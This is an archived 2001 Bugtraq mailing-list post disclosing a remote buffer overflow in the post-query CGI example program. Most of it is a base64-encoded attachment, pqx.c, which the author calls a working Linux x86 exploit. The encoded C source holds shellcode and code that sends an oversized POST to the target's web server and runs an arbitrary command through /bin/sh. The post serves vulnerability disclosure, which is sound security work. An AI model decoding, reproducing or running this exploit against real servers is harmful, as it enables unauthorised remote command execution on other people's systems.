 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Mon, 12 Mar 2001 12:39:56 +0100 From: proton <proton@ENERGYMECH.NET> To: BUGTRAQ@SECURITYFOCUS.COM Subject: Exploit: pqx.c -- post-query (CGI) remote buffer overflow This is a multi-part message in MIME format. --------------2EDE4EE86E51446E80D83F27 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Attached is a working exploit program for Linux-ix86. You may or may not be vulnerable to this exploit depending on a number of factors. Better safe than sorry, remove post-query if you have it. It is an example program designed to demonstrate how posting to CGI works and as such isnt useful for any normal webserver operations. In case the attachement is corrupted or lost, there is a copy available at; http://www.energymech.net/users/proton/pqx.c /proton [ http://www.energymech.net/users/proton/ ] --------------2EDE4EE86E51446E80D83F27 Content-Type: application/octet-stream; name="pqx.c" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="pqx.c" LyoKIHwgIHBxeC5jIC0tIHBvc3QtcXVlcnkgYnVmZmVyIG92ZXJmbG93IGV4cGxvaXQgZm9y IExpbnV4LWl4ODYKIHwgIENvcHlyaWdodCAoYykgMjAwMSBieSBwcm90b24uIEFsbCByaWdo dHMgcmVzZXJ2ZWQuCiB8CiB8ICBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91 IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogfCAgaXQgdW5kZXIgdGhlIHRl cm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkK IHwgIHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2ZXJzaW9uIDIgb2Yg dGhlIExpY2Vuc2UsIG9yCiB8ICAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9u LgogfAogfCAgVGhpcyBwcm9ncmFtIGlzIGRpc3RyaWJ1dGVkIGluIHRoZSBob3BlIHRoYXQg aXQgd2lsbCBiZSB1c2VmdWwsCiB8ICBidXQgV0lUSE9VVCBBTlkgV0FSUkFOVFk7IHdpdGhv dXQgZXZlbiB0aGUgaW1wbGllZCB3YXJyYW50eSBvZgogfCAgTUVSQ0hBTlRBQklMSVRZIG9y IEZJVE5FU1MgRk9SIEEgUEFSVElDVUxBUiBQVVJQT1NFLiAgU2VlIHRoZQogfCAgR05VIEdl bmVyYWwgUHVibGljIExpY2Vuc2UgZm9yIG1vcmUgZGV0YWlscy4KICovCiNpbmNsdWRlIDxz dGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1 ZGUgPHVuaXN0ZC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMvc29j a2V0Lmg+CiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+CiNpbmNsdWRlIDxhcnBhL2luZXQuaD4K I2luY2x1ZGUgPG5ldGRiLmg+CiNpbmNsdWRlIDxlcnJuby5oPgoKY2hhcgl0bXBbNTEyXTsK Y2hhcgkqaG9zdDsKY2hhcgkqcHJvZ25hbWU7CmNoYXIJKmNvbW1hbmQ7CgojZGVmaW5lIG91 dHB1dCh4KQl3cml0ZSgxLHgsc2l6ZW9mKHgpKQoKdW5zaWduZWQgY2hhciBzaGVsbGNvZGVb XSA9CgkiXHhlYlx4M2JceDVlXHg4ZFx4NWVceDEwXHg4OVx4MWVceDhkXHg3ZVx4MThceDg5 XHg3ZVx4MDRceDhkXHg3ZVx4MWJceDg5XHg3ZVx4MDgiCgkiXHhiOFx4NDBceDQwXHg0MFx4 NDBceDQ3XHg4YVx4MDdceDI4XHhlMFx4NzVceGY5XHgzMVx4YzBceDg4XHgwN1x4ODlceDQ2 XHgwY1x4ODgiCgkiXHg0Nlx4MTdceDg4XHg0Nlx4MWFceDg5XHhmMVx4OGRceDU2XHgwY1x4 YjBceDBiXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4XHg0MFx4Y2QiCgkiXHg4MFx4ZThceGMw XHhmZlx4ZmZceGZmXHgwMVx4MDFceDAxXHgwMVx4MDFceDAxXHgwMVx4MDFceDAxXHgwMVx4 MDFceDAxXHgwMVx4MDEiCgkiXHgwMVx4MDFceDAwIjsKCnZvaWQgbmV0cGlwZShpbnQgKnJz b2NrLCBpbnQgKndzb2NrLCBpbnQgc3opCnsKCXN0cnVjdAlzb2NrYWRkcl9pbiBzYWk7Cglz dHJ1Y3QJaG9zdGVudCAqaGU7CglpbnQJczsKCglpZiAoIWhvc3QgfHwgISpob3N0IHx8ICFj b21tYW5kIHx8ICEqY29tbWFuZCkKCXsKCQlwcmludGYoIlVzYWdlOiAlcyA8aG9zdD4gXCI8 Y29tbWFuZD5cIlxuIixwcm9nbmFtZSk7CgkJZXhpdCgxKTsKCX0KCWhlID0gZ2V0aG9zdGJ5 bmFtZShob3N0KTsKCWlmICghaGUpCgl7CgkJcHJpbnRmKCIlczogVW5rbm93biBob3N0XG4i LGhvc3QpOwoJCWV4aXQoMSk7Cgl9CgoJcyA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFN LDApOwoJc2FpLnNpbl9mYW1pbHkgPSBBRl9JTkVUOwoJc2FpLnNpbl9wb3J0ID0gaHRvbnMo ODApOwoJbWVtY3B5KCZzYWkuc2luX2FkZHIsaGUtPmhfYWRkcl9saXN0WzBdLHNpemVvZihz dHJ1Y3QgaW5fYWRkcikpOwoKCWlmIChjb25uZWN0KHMsKHN0cnVjdCBzb2NrYWRkciopJnNh aSxzaXplb2Yoc2FpKSkgPCAwKQoJewoJCXN3aXRjaChlcnJubykKCQl7CgkJY2FzZSBFQ09O TlJFRlVTRUQ6CgkJCW91dHB1dCgiQ29ubmVjdGlvbiByZWZ1c2VkLlxuIik7CgkJCWJyZWFr OwoJCWNhc2UgRVRJTUVET1VUOgoJCQlvdXRwdXQoIkNvbm5lY3Rpb24gdGltZWQgb3V0Llxu Iik7CgkJCWJyZWFrOwoJCWNhc2UgRU5FVFVOUkVBQ0g6CgkJCW91dHB1dCgiTmV0d29yayB1 bnJlYWNoYWJsZS5cbiIpOwoJCQlicmVhazsKCQlkZWZhdWx0OgoJCQlvdXRwdXQoIlVua25v d24gZXJyb3IuXG4iKTsKCQkJYnJlYWs7CgkJfQoJCWV4aXQoMSk7Cgl9CglvdXRwdXQoIkNv bm5lY3Rpb24gZXN0YWJsaXNoZWQuXG4iKTsKCgkqcnNvY2sgPSAqd3NvY2sgPSBzOwoJc3By aW50Zih0bXAsIlBPU1QgL2NnaS1iaW4vcG9zdC1xdWVyeSBIVFRQLzEuMFxyXG5Db250ZW50 LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG4iCgkJIkNvbnRl bnQtTGVuZ3RoOiAlaVxyXG5cclxuIixzeik7Cgl3cml0ZShzLHRtcCxzdHJsZW4odG1wKSk7 Cn0KCnZvaWQgX19kb2l0KHZvaWQpOwoKI2RlZmluZSBDTURTVFVCCQkiL2Jpbi9zaCAtYyAl c0AiCgppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpCnsKCWNoYXIJKnEsKmNwOwoJ aW50CWluLG91dDsKCWludAlzeix4LG47CgoJaWYgKGFyZ2MgPCAzKQoJewoJCWZwcmludGYo c3RkZXJyLCJVc2FnZTogJXMgPGhvc3RuYW1lPiBcIjxjb21tYW5kPlwiXG4iLGFyZ3ZbMF0p OwoJCWV4aXQoMSk7Cgl9CgoJcHJvZ25hbWUgPSBhcmd2WzBdOwoJaG9zdCA9IGFyZ3ZbMV07 Cgljb21tYW5kID0gYXJndlsyXTsKCgl4ID0gKDIqc3RybGVuKHNoZWxsY29kZSkpICsgc3Ry bGVuKGNvbW1hbmQpICsgc2l6ZW9mKENNRFNUVUIpOwoJc3ogPSA5OTk5ICsgeDsKCgluZXRw aXBlKCZpbiwmb3V0LHN6KTsKCgl0bXBbMF0gPSAwOwoJZm9yKHN6PTA7c3o8OTk5OTtzeisr KQoJewoJCXN0cmNhdCh0bXAsIiYiKTsKCQlpZiAoc3RybGVuKHRtcCkgPiA1MDApCgkJewoJ CQl3cml0ZShvdXQsdG1wLHN0cmxlbih0bXApKTsKCQkJdG1wWzBdID0gMDsKCQl9Cgl9Cgl3 cml0ZShvdXQsdG1wLHN0cmxlbih0bXApKTsKCglzcHJpbnRmKHRtcCwiJiVzPSVzIixzaGVs bGNvZGUsc2hlbGxjb2RlKTsKCXEgPSBzdHJjaHIodG1wLDApOwoJc3ByaW50ZihxLENNRFNU VUIsY29tbWFuZCk7Cgl3cml0ZShvdXQsdG1wLHgpOwoKCW91dHB1dCgiU2VudCBvdXIgc2hp dC5cbiIpOwoKCW4gPSB4ID0gMDsKCWZvcig7OykKCXsKCQlzeiA9IHJlYWQoaW4sJnRtcFt4 XSw1MTIteCk7CgkJaWYgKHN6IDwgMSkKCQkJYnJlYWs7CgkJeCArPSBzejsKCQlxID0gY3Ag PSB0bXA7CgkJZm9yKHN6PXg7c3o7KQoJCXsKCQkJaWYgKCpxID09ICdcbicpCgkJCXsKCQkJ CWlmIChzdHJuY21wKGNwLCI8bGk+IDxjb2RlPiA9IDwvY29kZT4iLHEtY3ApKQoJCQkJCXdy aXRlKDEsY3AsKHEtY3ApKzEpOwoJCQkJZWxzZQoJCQkJaWYgKCFuKQoJCQkJewoJCQkJCXdy aXRlKDEsIlxuPCEtLSBpZ25vcmluZyAxMCwwMDAgbGluZXMgb2YgY3JhcCAtLT5cblxuIiw0 MSk7CgkJCQkJbisrOwoJCQkJfQoJCQkJY3AgPSBxICsgMTsKCQkJfQoJCQlxKys7CgkJCXN6 LS07CgkJfQoJCWlmIChjcCAhPSB0bXApCgkJewoJCQlzeiA9IHggLSAoY3AgLSB0bXApOwoJ CQltZW1jcHkodG1wLGNwLHN6KTsKCQkJeCAtPSAoY3AgLSB0bXApOwoJCX0KCX0KCWV4aXQo MCk7Cn0K --------------2EDE4EE86E51446E80D83F27--
| |||||||||||||||||||||